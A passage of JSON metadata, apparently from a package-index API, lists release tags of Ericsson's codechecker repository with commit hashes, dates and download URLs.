Z","download_url":"https://codeload.github.com/Ericsson/codechecker/tar.gz/v6.18.0-hotfix1","html_url":"https://github.com/Ericsson/codechecker/releases/tag/v6.18.0-hotfix1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/Ericsson/codechecker@v6.18.0-hotfix1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.18.0-hotfix1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.18.0-hotfix1/manifests"},{"name":"v6.18.0","sha":"153b0e09efc715fd16eee815eecf454f9f79f7f1","kind":"commit","published_at":"2021-11-12T12:51:42.000Z","download_url":"https://codeload.github.com/Ericsson/codechecker/tar.gz/v6.18.0","html_url":"https://github.com/Ericsson/codechecker/releases/tag/v6.18.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/Ericsson/codechecker@v6.18.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.18.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.18.0/manifests"},{"name":"v6.17.0-hotfix1","sha":"315d4494603b02252966770452e676fd63a67021","kind":"commit","published_at":"2021-10-14T12:22:47.000Z","download_url":"https://codeload.github.com/Ericsson/codechecker/tar.gz/v6.17.0-hotfix1","html_url":"https://github.com/Ericsson/codechecker/releases/tag/v6.17.0-hotfix1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/Ericsson/codechecker@v6.17.0-hotfix1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.17.0-hotfix1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.17.0-hotfix1/manifests"},{"name":"v6.17.0","sha":"d0e2d7ba5f62d722e907d1ce8af6dbb24ee34e5d","kind":"commit","published_at":"2021-09-10T14:05:16.000Z","download_url":"https://codeload.github.com/Ericsson/codechecker/tar.gz/v6.17.0","html_url":"https://github.com/Ericsson/codechecker/releases/tag/v6.17.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/Ericsson/codechecker@v6.17.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.17.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.17.0/manifests"},{"name":"v6.16.0-hotfix1","sha":"dcb4c5c74697711e0b65bb88b1796aec34846649","kind":"commit","published_at":"2021-06-23T13:36:13.000Z","download_url":"https://codeload.github.com/Ericsson/codechecker/tar.gz/v6.16.0-hotfix1","html_url":"https://github.com/Ericsson/codechecker/releases/tag/v6.16.0-hotfix1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/Ericsson/codechecker@v6.16.0-hotfix1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.16.0-hotfix1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.16.0-hotfix1/manifests"},{"name":"v6.16.0","sha":"8880695af939838b2e1e16b018c51ed66c6a5366","kind":"commit","published_at":"2021-06-01T12:07:59.000Z","download_url":"https://codeload.github.com/Ericsson/codechecker/tar.gz/v6.16.0","html_url":"https://github.com/Ericsson/codechecker/releases/tag/v6.16.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/Ericsson/codechecker@v6.16.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.16.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.16.0/manifests"},{"name":"v6.15.2","sha":"63740679d61ff715175b9f31858d2fe9767efa41","kind":"commit","published_at":"2021-04-06T13:47:08.000Z","download_url":"https://codeload.github.com/Ericsson/codechecker/tar.gz/v6.15.2","html_url":"https://github.com/Ericsson/codechecker/releases/tag/v6.15.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/Ericsson/codechecker@v6.15.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.15.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.15.2/manifests"},{"name":"v6.15.1-hotfix1","sha":"55c53a71295e07ea9ae3370130e6495649e8760a","kind":"commit","published_at":"2021-03-10T10:18:49.000Z","download_url":"https://codeload.github.com/Ericsson/codechecker/tar.gz/v6.15.1-hotfix1","html_url":"https://github.com/Ericsson/codechecker/releases/tag/v6.15.1-hotfix1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/Ericsson/codechecker@v6.15.1-hotfix1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.15.1-hotfix1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.15.1-hotfix1/manifests"},{"name":"v6.15.1","sha":"692e51ba4be08e97c4b07cc344edca082dc50f63","kind":"commit","published_at":"2021-02-03T12:52:17.000Z","download_url":"https://codeload.github.com/Ericsson/codechecker/tar.gz/v6.15.1","html_url":"https://github.com/Ericsson/codechecker/releases/tag/v6.15.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/Ericsson/codechecker@v6.15.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.15.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.15.1/manifests"},{"name":"v6.15.0-hotfix1","sha":"267e9cb77e55f77a457b3b1f2f3660f35564939e","kind":"commit","published_at":"2021-01-08T11:03:43.000Z","download_url":"https://codeload.github.com/Ericsson/codechecker/tar.gz/v6.15.0-hotfix1","html_url":"https://github.com/Ericsson/codechecker/releases/tag/v6.15.0-hotfix1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/Ericsson/codechecker@v6.15.0-hotfix1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.15.0-hotfix1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.15.0-hotfix1/manifests"},{"name":"v6.15.0","sha":"131861b7e94298f58cad883a533814573b89a0f3","kind":"commit","published_at":"2020-11-12T23:55:40.000Z","download_url":"https://codeload.github.com/Ericsson/codechecker/tar.gz/v6.15.0","html_url":"https://github.com/Ericsson/codechecker/releases/tag/v6.15.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/Ericsson/codechecker@v6.15.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.15.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.15.0/manifests"},{"name":"v6.14.0","sha":"644f900e80e2053cdb7d69eee3dfa34e622c185c","kind":"commit","published_at":"2020-09-11T13:12:47.000Z","download_url":"https://codeload.github.com/Ericsson/codechecker/tar.gz/v6.14.0","html_url":"https://github.com/Ericsson/codechecker/releases/tag/v6.14.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/Ericsson/codechecker@v6.14.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.14.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.14.0/manifests"},{"name":"v6.13.0","sha":"17678b103375a9dbff6e69328d0996d54de78ef3","kind":"commit","published_at":"2020-07-10T13:24:53.000Z","download_url":"https://codeload.github.com/Ericsson/codechecker/tar.gz/v6.13.0","html_url":"https://github.com/Ericsson/codechecker/releases/tag/v6.13.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/Ericsson/codechecker@v6.13.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.13.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.13.0/manifests"},{"name":"v6.12.1","sha":"be4c6ac31f125be8432589ea9e9e5b1bbd838d22","kind":"commit","published_at":"2020-06-12T11:46:39.000Z","download_url":"https://codeload.github.com/Ericsson/codechecker/tar.gz/v6.12.1","html_url":"https://github.com/Ericsson/codechecker/releases/tag/v6.12.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/Ericsson/codechecker@v6.12.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.12.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.12.1/manifests"},{"name":"v6.12.0","sha":"ecccb6308db0a16d80bb6273280d482576d28d8b","kind":"commit","published_at":"2020-05-14T17:59:12.000Z","download_url":"https://codeload.github.com/Ericsson/codechecker/tar.gz/v6.12.0","html_url":"https://github.com/Ericsson/codechecker/releases/tag/v6.12.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/Ericsson/codechecker@v6.12.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.12.0/manifests"},{"name":"v6.11.1","sha":"9bb0047368707a18efaca3a207dc8227c8e19b9e","kind":"commit","published_at":"2020-02-12T23:12:06.000Z","download_url":"https://codeload.github.com/Ericsson/codechecker/tar.gz/v6.11.1","html_url":"https://github.com/Ericsson/codechecker/releases/tag/v6.11.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/Ericsson/codechecker@v6.11.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.11.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.11.1/manifests"},{"name":"v6.11.0","sha":"65a042f1ad0dec5581d54cb13396d201a573c0b2","kind":"commit","published_at":"2019-12-12T16:41:02.000Z","download_url":"https://codeload.github.com/Ericsson/codechecker/tar.gz/v6.11.0","html_url":"https://github.com/Ericsson/codechecker/releases/tag/v6.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/Ericsson/codechecker@v6.11.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.11.0/manifests"},{"name":"v6.10.1","sha":"d3928e30d25bd10da977d2d1119f300a30179cc0","kind":"commit","published_at":"2019-10-09T14:33:54.000Z","download_url":"https://codeload.github.com/Ericsson/codechecker/tar.gz/v6.10.1","html_url":"https://github.com/Ericsson/codechecker/releases/tag/v6.10.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/Ericsson/codechecker@v6.10.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.10.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.10.1/manifests"},{"name":"v6.10.0","sha":"28cb13900c6e2ada55f469d267e05cab9844a97a","kind":"commit","published_at":"2019-07-11T18:00:44.000Z","download_url":"https://codeload.github.com/Ericsson/codechecker/tar.gz/v6.10.0","html_url":"https://github.com/Ericsson/codechecker/releases/tag/v6.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/Ericsson/codechecker@v6.10.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.10.0/manifests"},{"name":"v6.9.1","sha":"197579e082c64e42043683b4e14ae2228a5c7d89","kind":"commit","published_at":"2019-04-11T13:22:48.000Z","download_url":"https://codeload.github.com/Ericsson/codechecker/tar.gz/v6.9.1","html_url":"https://github.com/Ericsson/codechecker/releases/tag/v6.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/Ericsson/codechecker@v6.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.9.1/manifests"},{"name":"v6.9.0","sha":"03351d259b47a57d0c0daebf2a2b00149ea37298","kind":"commit","published_at":"2019-02-08T14:26:17.000Z","download_url":"https://codeload.github.com/Ericsson/codechecker/tar.gz/v6.9.0","html_url":"https://github.com/Ericsson/codechecker/releases/tag/v6.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/Ericsson/codechecker@v6.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.9.0/manifests"},{"name":"v6.8.1","sha":"e8b4c6172b45428f997c0e7f37891e11ae312180","kind":"commit","published_at":"2018-11-08T10:10:47.000Z","download_url":"https://codeload.github.com/Ericsson/codechecker/tar.gz/v6.8.1","html_url":"https://github.com/Ericsson/codechecker/releases/tag/v6.8.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/Ericsson/codechecker@v6.8.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.8.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.8.1/manifests"},{"name":"v6.8.0","sha":"2bd99a0b24b4b62fb85992f94ab682c4a9ddc362","kind":"commit","published_at":"2018-09-11T11:33:21.000Z","download_url":"https://codeload.github.com/Ericsson/codechecker/tar.gz/v6.8.0","html_url":"https://github.com/Ericsson/codechecker/releases/tag/v6.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/Ericsson/codechecker@v6.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.8.0/manifests"},{"name":"v6.7.1","sha":"968bd5ae5f82fe2d5d329005a2e7748c1200d8fc","kind":"commit","published_at":"2018-06-08T09:08:07.000Z","download_url":"https://codeload.github.com/Ericsson/codechecker/tar.gz/v6.7.1","html_url":"https://github.com/Ericsson/codechecker/releases/tag/v6.7.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/Ericsson/codechecker@v6.7.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.7.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.7.1/manifests"},{"name":"v6.7.0","sha":"9c4f1c514517af66c92e8b73332a79f2adf69e73","kind":"commit","published_at":"2018-05-16T11:22:56.000Z","download_url":"https://codeload.github.com/Ericsson/codechecker/tar.gz/v6.7.0","html_url":"https://github.com/Ericsson/codechecker/releases/tag/v6.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/Ericsson/codechecker@v6.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.7.0/manifests"},{"name":"v6.6.0","sha":"d507de883bd29bdc8221e8ecb74c9d1117ad5867","kind":"commit","published_at":"2018-03-22T14:30:07.000Z","download_url":"https://codeload.github.com/Ericsson/codechecker/tar.gz/v6.6.0","html_url":"https://github.com/Ericsson/codechecker/releases/tag/v6.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/Ericsson/codechecker@v6.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.6.0/manifests"},{"name":"v6.5.1","sha":"fd2df3820f3985e4b2e2b576d0cc9aa9c2474348","kind":"commit","published_at":"2018-02-22T16:01:26.000Z","download_url":"https://codeload.github.com/Ericsson/codechecker/tar.gz/v6.5.1","html_url":"https://github.com/Ericsson/codechecker/releases/tag/v6.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/Ericsson/codechecker@v6.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.5.1/manifests"},{"name":"v6.5","sha":"7370d62dccac3c5ce2771764fa92b8e3bc22bbac","kind":"commit","published_at":"2018-02-07T12:01:41.000Z","download_url":"https://codeload.github.com/Ericsson/codechecker/tar.gz/v6.5","html_url":"https://github.com/Ericsson/codechecker/releases/tag/v6.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/Ericsson/codechecker@v6.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.5/manifests"},{"name":"v6.4","sha":"32ea3cf57eb71255307c065ff8bac6513e0064b9","kind":"commit","published_at":"2018-01-11T14:04:15.000Z","download_url":"https://codeload.github.com/Ericsson/codechecker/tar.gz/v6.4","html_url":"https://github.com/Ericsson/codechecker/releases/tag/v6.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/Ericsson/codechecker@v6.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.4/manifests"},{"name":"v6.3","sha":"44c2a7740fa27b9459c40daea2b7836b1c8ca250","kind":"commit","published_at":"2017-12-11T19:02:13.000Z","download_url":"https://codeload.github.com/Ericsson/codechecker/tar.gz/v6.3","html_url":"https://github.com/Ericsson/codechecker/releases/tag/v6.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/Ericsson/codechecker@v6.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.3/manifests"},{"name":"v6.2.1","sha":"174807916c5df8cd80bb08d5f11ac6a49f9e91bf","kind":"commit","published_at":"2017-11-27T16:06:34.000Z","download_url":"https://codeload.github.com/Ericsson/codechecker/tar.gz/v6.2.1","html_url":"https://github.com/Ericsson/codechecker/releases/tag/v6.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/Ericsson/codechecker@v6.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.2.1/manifests"},{"name":"v6.2","sha":"b5ef68f0049ce63a767d82ca602b470ad3f5e758","kind":"commit","published_at":"2017-11-15T16:54:58.000Z","download_url":"https://codeload.github.com/Ericsson/codechecker/tar.gz/v6.2","html_url":"https://github.com/Ericsson/codechecker/releases/tag/v6.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/Ericsson/codechecker@v6.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.2/manifests"},{"name":"v6.1.1","sha":"64e128e075defb1e05002ecef481ca120d79fb84","kind":"commit","published_at":"2017-10-27T14:25:16.000Z","download_url":"https://codeload.github.com/Ericsson/codechecker/tar.gz/v6.1.1","html_url":"https://github.com/Ericsson/codechecker/releases/tag/v6.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/Ericsson/codechecker@v6.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.1.1/manifests"},{"name":"v6.1","sha":"ab67d2626297da41ec42afa2cbb404538069db1f","kind":"commit","published_at":"2017-10-13T16:22:51.000Z","download_url":"https://codeload.github.com/Ericsson/codechecker/tar.gz/v6.1","html_url":"https://github.com/Ericsson/codechecker/releases/tag/v6.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/Ericsson/codechecker@v6.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.1/manifests"},{"name":"v6.0.1","sha":"f7506fde033e6f57af6612847b447af69077ac8c","kind":"commit","published_at":"2017-10-02T09:28:23.000Z","download_url":"https://codeload.github.com/Ericsson/codechecker/tar.gz/v6.0.1","html_url":"https://github.com/Ericsson/codechecker/releases/tag/v6.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/Ericsson/codechecker@v6.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.0.1/manifests"},{"name":"v6.0","sha":"666452b9ab4fc97438ac2c45166def3bd3269971","kind":"commit","published_at":"2017-09-18T22:19:23.000Z","download_url":"https://codeload.github.com/Ericsson/codechecker/tar.gz/v6.0","html_url":"https://github.com/Ericsson/codechecker/releases/tag/v6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/Ericsson/codechecker@v6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.0/manifests"},{"name":"v5.10","sha":"927979c4eee9f53f5fec79fba3e1be7c606c599c","kind":"commit","published_at":"2017-08-09T18:31:55.000Z","download_url":"https://codeload.github.com/Ericsson/codechecker/tar.gz/v5.10","html_url":"https://github.com/Ericsson/codechecker/releases/tag/v5.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/Ericsson/codechecker@v5.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v5.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v5.10/manifests"},{"name":"v5.9","sha":"ebb1d0330efa1da5712a01c92e0c004aba46bd05","kind":"commit","published_at":"2017-07-14T14:09:07.000Z","download_url":"https://codeload.github.com/Ericsson/codechecker/tar.gz/v5.9","html_url":"https://github.com/Ericsson/codechecker/releases/tag/v5.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/Ericsson/codechecker@v5.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v5.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v5.9/manifests"},{"name":"v5.8","sha":"e8f7d02769a613286c1749d70495ba6a41f7427c","kind":"commit","published_at":"2017-07-07T12:32:03.000Z","download_url":"https://codeload.github.com/Ericsson/codechecker/tar.gz/v5.8","html_url":"https://github.com/Ericsson/codechecker/releases/tag/v5.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/Ericsson/codechecker@v5.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v5.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v5.8/manifests"},{"name":"v5.7.1","sha":"2eca2df6a9d0f5482c1783f063568de5c1ddbe5d","kind":"commit","published_at":"2017-02-09T17:03:56.000Z","download_url":"https://codeload.github.com/Ericsson/codechecker/tar.gz/v5.7.1","html_url":"https://github.com/Ericsson/codechecker/releases/tag/v5.7.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/Ericsson/codechecker@v5.7.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v5.7.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v5.7.1/manifests"},{"name":"v5.7","sha":"1ce7ccbefb1212726331a1fcde4dd37a17cdaccf","kind":"commit","published_at":"2017-01-11T17:17:22.000Z","download_url":"https://codeload.github.com/Ericsson/codechecker/tar.gz/v5.7","html_url":"https://github.com/Ericsson/codechecker/releases/tag/v5.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/Ericsson/codechecker@v5.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v5.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v5.7/manifests"},{"name":"v5.6","sha":"e1b0157ad9f61a946fa0343708be7336cf1a6314","kind":"commit","published_at":"2016-11-15T09:20:43.000Z","download_url":"https://codeload.github.com/Ericsson/codechecker/tar.gz/v5.6","html_url":"https://github.com/Ericsson/codechecker/releases/tag/v5.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/Ericsson/codechecker@v5.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v5.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v5.6/manifests"},{"name":"v5.5","sha":"c7bafa16fdaf48ed7a890aea002ae0275e32d963","kind":"commit","published_at":"2016-08-30T10:06:53.000Z","download_url":"https://codeload.github.com/Ericsson/codechecker/tar.gz/v5.5","html_url":"https://github.com/Ericsson/codechecker/releases/tag/v5.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/Ericsson/codechecker@v5.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v5.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v5.5/manifests"},{"name":"v5.4","sha":"bcc8c663294739c3946e6cd147e0f98fa0e2d57f","kind":"commit","published_at":"2016-08-05T10:43:49.000Z","download_url":"https://codeload.github.com/Ericsson/codechecker/tar.gz/v5.4","html_url":"https://github.com/Ericsson/codechecker/releases/tag/v5.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/Ericsson/codechecker@v5.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v5.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v5.4/manifests"},{"name":"v5.3","sha":"902c6cf189d747faae5684c4f3f790224dde5eab","kind":"commit","published_at":"2016-04-14T15:55:10.000Z","download_url":"https://codeload.github.com/Ericsson/codechecker/tar.gz/v5.3","html_url":"https://github.com/Ericsson/codechecker/releases/tag/v5.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/Ericsson/codechecker@v5.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v5.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v5.3/manifests"},{"name":"5.2","sha":"13cd6b405ed50ed5865c486eda44bf7e7d52b929","kind":"commit","published_at":"2016-02-17T12:35:47.000Z","download_url":"https://codeload.github.com/Ericsson/codechecker/tar.gz/5.2","html_url":"https://github.com/Ericsson/codechecker/releases/tag/5.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/Erics